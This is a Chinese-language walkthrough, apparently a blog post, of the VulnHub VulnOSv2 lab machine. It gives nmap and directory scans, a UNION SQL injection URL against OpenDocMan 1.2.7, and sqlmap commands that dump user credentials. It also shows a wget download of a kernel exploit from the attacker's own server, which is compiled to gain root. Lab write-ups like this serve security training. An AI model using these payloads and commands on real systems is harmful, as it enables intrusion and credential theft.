vulnhub靶场vulnosv2靶场

vulnhub靶场–vulnosv2靶场

信息收集

主机发现

ifconfig
在这里插入图片描述
nmap 192.168.17.0/24 在这里插入图片描述

端口扫描

nmap -sS -sV -A 192.168.17.135 -p-[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qlr25rWw-1670482125650)(C:\Users\嘿嘿也不太行\AppData\Roaming\Typora\typora-user-images\image-20221111231619786.png)]

目录扫描

dirb http://192.168.17.135
在这里插入图片描述
dirsearch -u http://192.168.17.135
在这里插入图片描述

http://192.168.17.135/index.html
http://192.168.17.135/javascript/jquery/jquery
http://192.168.17.135/javascript/jquery/version

中间件

在这里插入图片描述

威胁建模

渗透攻击

访问http://192.168.17.135/index.html
在这里插入图片描述
然后点击页面跳转到http://192.168.17.135/jabc/
在这里插入图片描述
在documentation目录下是一片黑
在这里插入图片描述
然后再源码里看到啦一个目录
在这里插入图片描述
然后在源码里也可以看到这些子的颜色是黑色所以我们之前没有发现
在这里插入图片描述
进入http://192.168.17.135/jabcd0cs/目录
在这里插入图片描述
可以看到
在这里插入图片描述
cms opendocman 1.2.7
在这里插入图片描述
搜索一下是否有漏洞
在这里插入图片描述
有两个漏洞

http://192.168.17.135/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9

在这里插入图片描述
在这里插入图片描述
直接上sqlmap吧

sqlmap -u "http://192.168.17.135/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20" -level=3 -risk=3 --dbs

在这里插入图片描述

sqlmap -u "http://192.168.17.135/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20" -level=3 -risk=3 -D jabcd0cs --tables

在这里插入图片描述

sqlmap -u "http://192.168.17.135/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20" -level=3 -risk=3 -D jabcd0cs -T odm_admin --columns

在这里插入图片描述

sqlmap -u "http://192.168.17.135/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20" -level=3 -risk=3 -D jabcd0cs -T odm_user --columns

在这里插入图片描述

sqlmap -u "http://192.168.17.135/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -level=3 -risk=3 -D jabcd0cs -T odm_user -C username,password --dump

在这里插入图片描述
在这里插入图片描述
webmin 密码webmin1980
ssh连接

后渗透攻击

ssh连接
在这里插入图片描述
在这里插入图片描述
python -m SimpleHTTPServer 8888
wget http://192.168.17.128:8888/37292.c
在这里插入图片描述
将提权脚本传输过来
然后编译gcc 37292.c -o heihei
在这里插入图片描述
是root权限啦然后就是查看flag
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值